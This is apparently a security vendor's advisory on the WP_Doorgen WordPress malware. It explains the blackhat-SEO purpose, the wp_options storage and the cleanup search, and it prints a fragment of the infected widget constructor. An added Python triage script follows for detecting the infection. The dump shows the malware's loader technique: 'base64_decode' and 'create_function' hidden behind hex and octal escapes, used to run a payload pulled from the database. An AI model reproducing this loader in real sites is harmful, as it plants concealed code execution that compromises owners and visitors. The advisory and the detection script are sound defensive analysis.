Blackhat SEO is a malicious technique used to manipulate search engine results so that a website appears more relevant than it is. The payload is PHP-based, so it is executed directly on the server while the site is loaded. Only the result of the payload (such as a malicious iframe or a redirect) is visible in the browser, not the malicious code itself.
WP_Doorgen acts as a valid widget in WordPress installations. It stores the payload inside the WordPress database (in wp_options, with a wp_doorgen_ prefix in the name column). This payload is obfuscated using strrev and base64 encoding.
Affecting
Vulnerable WordPress installations (outdated software or compromised passwords)
Cleanup
Cleanup is done by deleting the malicious file. The infection can be found in your system by searching for the wp_doorgen string inside your files and database.
You can also sign up with us and let our team remove the malware for you.
Dump
function __construct( $id_base = false, $name, $widget_options = array(), $control_options = array(), $unique_id = "\x62\x61\163\145\x36\x34\x5f\x64\x65\143\x6f\144\145", $unique_hash = "\x63\x72\x65\x61\x74\145\137\x66\165\x6e\x63\164\x69\x6f\156" ) {
    $this->id_base = empty($id_base) ? preg_replace( '/.*_/', '', strtolower(get_class($this)) ) : strtolower($id_base);
    $this->option_name = 'wp_doorgen_' . $this->id_base;
    $name = $unique_hash('',$this->update_callback($unique_id));
    //$this->widget_options = $this->get_widget_options();
    $this->control_options = array($name());
    define('wp_class_support',true);
}
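
Added example (not part of the original page or of the malware dump): a Python triage script for the file search described under Cleanup. It flags PHP source that contains the wp_doorgen marker and decodes hex/octal string escapes like the ones in the constructor's default arguments to reveal hidden function names. The function names, the watch list and the sample input are assumptions constructed for illustration.

```python
import re

MARKER = "wp_doorgen"  # string the page says to search for
# Assumed watch list: function names worth flagging when hidden behind escapes
SUSPICIOUS = ("base64_decode", "create_function", "strrev", "eval")

# PHP double-quoted escapes: \xHH (1-2 hex digits) or \OOO (1-3 octal digits)
_ESCAPE = re.compile(r"\\x([0-9A-Fa-f]{1,2})|\\([0-7]{1,3})")
_DQ_STRING = re.compile(r'"((?:[^"\\]|\\.)*)"')


def decode_php_escapes(literal):
    """Decode \\xHH and octal escapes the way PHP does inside double quotes."""
    def repl(m):
        code = int(m.group(1), 16) if m.group(1) else int(m.group(2), 8) & 0xFF
        return chr(code)
    return _ESCAPE.sub(repl, literal)


def scan_php_source(source):
    """Return (line_no, reason, detail) findings for the text of one PHP file."""
    findings = []
    for no, line in enumerate(source.splitlines(), 1):
        if MARKER in line.lower():
            findings.append((no, "marker", MARKER))
        for m in _DQ_STRING.finditer(line):
            raw = m.group(1)
            if not _ESCAPE.search(raw):
                continue  # plain string, nothing hidden
            decoded = decode_php_escapes(raw).lower()
            for name in SUSPICIOUS:
                if name in decoded and name not in raw.lower():
                    findings.append((no, "escaped-function-name", name))
    return findings


# Constructed sample modelled on the dump; not a complete or working payload.
SAMPLE = r'''<?php
$this->option_name = 'wp_doorgen_' . $this->id_base;
$a = "\x62\x61\163\145\x36\x34\x5f\x64\x65\143\x6f\144\145";
$b = "\x63\x72\x65\x61\x74\145\137\x66\165\x6e\x63\164\x69\x6f\156";
$title = "Recent posts";
'''

if __name__ == "__main__":
    for finding in scan_php_source(SAMPLE):
        print(finding)
```

To cover the database side of the search, the same function can be run over the text of a SQL export of the wp_options table.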